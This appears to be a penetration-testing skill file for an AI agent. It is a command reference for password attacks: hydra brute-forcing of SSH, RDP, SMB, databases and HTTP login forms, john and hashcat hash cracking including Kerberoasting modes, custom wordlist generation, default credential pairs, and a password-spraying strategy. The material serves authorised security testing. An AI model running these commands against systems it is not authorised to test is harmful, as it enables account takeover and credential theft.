| name | pentest-passwords |
| description | Password attack tool reference covering hydra (network brute-forcing), john the ripper (hash cracking), hashcat (GPU-accelerated cracking), and supporting tools (cewl, crunch, hash-identifier). Use during authentication testing and credential attacks in a penetration test.
|
| version | 2.0.0 |
| triggers | ["password","brute force","hydra","john","hashcat","hash cracking","credential","wordlist","dictionary attack","login","authentication"] |
Password Attacks — Tool Reference
Hydra — Network Service Brute-Forcer
Common Protocols
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://<target>
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt ssh://<target>
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://<target>
hydra -L users.txt -P passwords.txt smb://<target>
hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://<target>
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<target>
hydra -l postgres -P /usr/share/wordlists/rockyou.txt postgres://<target>
hydra -P /usr/share/seclists/Passwords/Common-Credentials/common-snmp-community-strings.txt <target> snmp
HTTP Forms
hydra -l admin -P /usr/share/wordlists/rockyou.txt <target> http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
hydra -l admin -P /usr/share/wordlists/rockyou.txt <target> http-get /admin
hydra -l admin -P passwords.txt -s 443 -S <target> http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
Options
hydra -s 2222 -t 4 -l root -P passwords.txt ssh://<target>
hydra -l admin -P passwords.txt -f ssh://<target>
hydra -l admin -P passwords.txt -V ssh://<target>
hydra -R
hydra -L users.txt -p 'Password123!' ssh://<target>
hydra -l admin -P passwords.txt -W 3 ssh://<target>
John the Ripper — Hash Cracker
Basic Usage
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --format=raw-sha256 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --list=formats
Advanced Modes
john --incremental hashes.txt
john --incremental:Alpha hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64 hashes.txt
john --wordlist=wordlist.txt --rules=jumbo hashes.txt
john --fork=4 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --session=mysession hashes.txt
john --restore=mysession
john --mask='?l?l?l?l?d?d?d?d' hashes.txt
Hash Extraction Tools
Hashcat — GPU/CPU Hash Cracker
Attack Modes
hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 0 -a 3 hashes.txt ?l?l?l?l?l?l?l?l
hashcat -m 0 -a 1 hashes.txt wordlist1.txt wordlist2.txt
hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 0 -a 6 hashes.txt /usr/share/wordlists/rockyou.txt ?d?d?d?d
hashcat -m 0 -a 7 hashes.txt ?d?d?d?d /usr/share/wordlists/rockyou.txt
Common Hash Types (-m)
0 = MD5
100 = SHA1
1400 = SHA256
1700 = SHA512
1800 = sha512crypt ($6$)
3200 = bcrypt
1000 = NTLM
5500 = NetNTLMv1
5600 = NetNTLMv2
13100 = Kerberos TGS-REP (Kerberoasting)
18200 = Kerberos AS-REP (AS-REP Roasting)
7500 = Kerberos AS-REQ Pre-Auth
22000 = WPA-PBKDF2-PMKID+EAPOL
500 = md5crypt ($1$)
Options
hashcat -m 0 hashes.txt --show
hashcat -b
hashcat -m 0 -a 0 --force hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 0 -a 3 --increment --increment-min 4 --increment-max 8 hashes.txt ?a?a?a?a?a?a?a?a
Mask Charsets
?l = lowercase (a-z)
?u = uppercase (A-Z)
?d = digits (0-9)
?s = special (!@#$%^...)
?a = all printable
?b = all bytes (0x00-0xff)
Supporting Tools
Hash Identifier
hash-identifier
hashid '<hash_string>'
hashid -m '<hash_string>'
CeWL — Custom Wordlist Generator
cewl http://<target> -w /tmp/custom_wordlist.txt
cewl http://<target> -m 6 -w /tmp/wordlist.txt
cewl http://<target> -e --email_file /tmp/emails.txt
cewl http://<target> -d 3 -w /tmp/wordlist.txt
Crunch — Pattern-Based Wordlist Generator
crunch 8 8 abcdefghijklmnopqrstuvwxyz -o /tmp/wordlist.txt
crunch 8 8 -t @@@@%%%% -o /tmp/wordlist.txt
crunch 10 12 -t Company%%^^ -o /tmp/company_wordlist.txt
Attack Strategies
Default Credentials
Always test first — saves time:
admin:admin, admin:password, root:root, root:toor
administrator:administrator, guest:guest
admin:123456, admin:admin123, test:test
Targeted Wordlists
- Generate from target website:
cewl http://<target> -m 6 -w /tmp/custom.txt
- Add common mutations:
john --wordlist=/tmp/custom.txt --rules=best64 --stdout > /tmp/mutated.txt
- Use mutated list:
hydra -l admin -P /tmp/mutated.txt ssh://<target>
Hash Cracking Priority
- Check hash type:
hash-identifier or hashid -m
- Try john with rockyou:
john --format=<type> --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
- Try hashcat with rules:
hashcat -m <mode> -a 0 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
- If needed, mask attack:
hashcat -m <mode> -a 3 --increment hashes.txt ?a?a?a?a?a?a?a?a --force
Tool Selection Guide
| Situation | Best Tool |
|---|
| Brute force network service | hydra |
| Crack password hashes (CPU) | john |
| Crack hashes (GPU/rules) | hashcat --force |
| Identify hash type | hash-identifier or hashid |
| Generate custom wordlist | cewl (from website) or crunch (patterns) |
| HTTP login form attack | hydra http-post-form |
| Password spray (1 pass, many users) | hydra -L users.txt -p 'pass' or crackmapexec |
| Extract hashes from files | *2john tools (ssh2john, zip2john, etc.) |